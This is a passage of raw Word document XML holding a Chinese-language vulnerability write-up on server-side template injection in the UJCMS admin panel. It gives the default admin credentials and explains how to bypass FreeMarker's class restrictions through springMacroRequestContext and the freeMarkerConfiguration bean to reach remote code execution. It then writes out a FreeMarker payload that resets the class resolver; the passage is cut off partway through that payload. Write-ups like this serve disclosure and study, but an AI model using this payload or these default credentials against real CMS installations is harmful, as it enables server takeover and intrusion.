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2B45" w14:textId="7811B142" w:rsidR="00561C02" w:rsidRDefault="00561C02" w:rsidP="00561C02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UJCMS后台存在SSTI模板注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EBD1DC" w14:textId="24890008" w:rsidR="00232D7D" w:rsidRDefault="00561C02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561C02">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0A5BC7" w14:textId="06DF56E9" w:rsidR="00561C02" w:rsidRDefault="00561C02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IDEA：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010BC785" w14:textId="6701FD00" w:rsidR="00561C02" w:rsidRPr="00561C02" w:rsidRDefault="00561C02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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00561C02">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MySQL需要使用8.0以上版本，默认数据库引擎修改为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00561C02">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（在my.ini中修改）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2A879F" w14:textId="2192F385" w:rsidR="00561C02" w:rsidRDefault="00561C02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561C02">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>default-storage-engine=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00561C02">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="307C1A5F" w14:textId="705C41F6" w:rsidR="00561C02" w:rsidRDefault="00561C02">
      <w:pPr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2.</w:t>
      </w:r>
      <w:r w:rsidR="00CF533E">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jdk11</w:t>
      </w:r>
      <w:r w:rsidR="00CF533E">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>或17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F2FB51" w14:textId="1748EEE0" w:rsidR="00561C02" w:rsidRDefault="00561C02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00561C02">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6970D8" w14:textId="7600E2E6" w:rsidR="00CF533E" w:rsidRPr="00CF533E" w:rsidRDefault="00CF533E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00CF533E">
          <w:rPr>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://gitee.com/dromara/ujcms</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CF533E">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  jar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CF533E">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>包部署</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CF533E">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>教程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659B79CB" w14:textId="77777777" w:rsidR="00CF533E" w:rsidRDefault="00CF533E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B193C8" w14:textId="3669B4AF" w:rsidR="00CF533E" w:rsidRDefault="00CF533E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代码审计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42403A20" w14:textId="6AB9DBDB" w:rsidR="00CF533E" w:rsidRPr="00CF533E" w:rsidRDefault="00CF533E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF533E">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>查看pom.xml发现</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>freemarker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5484495C" w14:textId="452367F2" w:rsidR="00CF533E" w:rsidRDefault="00CF533E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF533E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:noProof/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A5780F5" wp14:editId="7A0EBDD0">
            <wp:extent cx="5274310" cy="3013075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1182583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83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F2B8" w14:textId="1492DB27" w:rsidR="00585808" w:rsidRDefault="00585808">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585808">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://ip:port/cp来到后台 默认用户名密码</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00585808">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，发现存在模板编辑功能。尝试</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="478E587C" w14:textId="16513728" w:rsidR="00585808" w:rsidRDefault="00585808">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00585808">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44BDA703" wp14:editId="4569AF57">
            <wp:extent cx="5274310" cy="2387600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="877998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98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0654" w14:textId="77777777" w:rsidR="00E244D5" w:rsidRDefault="00585808" w:rsidP="00585808">
      <w:pPr>
        <w:wordWrap w:val="0"/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此时使用普通</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>freemarker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的payload无法生效，默认禁用了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00585808">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>freemarker.template.utility.Execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00585808">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>freemarker.template.utility.ObjectConstructor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001258BB">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA54E2" w14:textId="74BB6B15" w:rsidR="00E244D5" w:rsidRDefault="001258BB" w:rsidP="00585808">
      <w:pPr>
        <w:wordWrap w:val="0"/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但因为该项目</w:t>
      </w:r>
      <w:r w:rsidR="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>springboot+freemarker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A56EC3" w14:textId="36D4C903" w:rsidR="00585808" w:rsidRDefault="00E244D5" w:rsidP="00585808">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>springMacroRequestContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SpringBoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>内置提供的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SpringMVC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Freemarker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>集成的对象，默认情况下如果</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Freemarker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>模板被</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SpringMVC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>渲染，它就会存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。通过它来获取到当前的上下文也就是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webApplicationContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="000611D6">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000611D6" w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>webApplicationContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以获取到Spring容器内的所有Bean。</w:t>
      </w:r>
      <w:r w:rsidR="000611D6">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过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getBean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('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freeMarkerConfiguration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')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>获取到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freeMarker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的配置Bean。</w:t>
      </w:r>
      <w:r w:rsidR="000611D6">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>最后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>内置类解析器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，使其可以绕过默认安全限制，创建</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>freemarker.template.utility.Execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>危险实例，从而实现RCE。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEBBC3D" w14:textId="321AC8E9" w:rsidR="00E244D5" w:rsidRDefault="00E244D5" w:rsidP="00585808">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Payload如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3495CA9D" w14:textId="77777777" w:rsidR="00E244D5" w:rsidRPr="00E244D5" w:rsidRDefault="00E244D5" w:rsidP="00E244D5">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[#assign ac=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springMacroRequestContext.webApplicationContext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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718AC951" w14:textId="77777777" w:rsidR="00E244D5" w:rsidRPr="00E244D5" w:rsidRDefault="00E244D5" w:rsidP="00E244D5">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  [#assign fc=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ac.getBean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('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freeMarkerConfiguration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')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745A11EC" w14:textId="77777777" w:rsidR="00E244D5" w:rsidRPr="00E244D5" w:rsidRDefault="00E244D5" w:rsidP="00E244D5">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    [#assign 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dcr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=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fc.getDefaultConfiguration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().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>getNewBuiltinClassResolver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08886112" w14:textId="711FED17" w:rsidR="00E244D5" w:rsidRDefault="00E244D5" w:rsidP="00E244D5">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      [#assign VOID=fc.setNewBuiltinClassResolver(dcr)]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E244D5">
        <w:rPr>
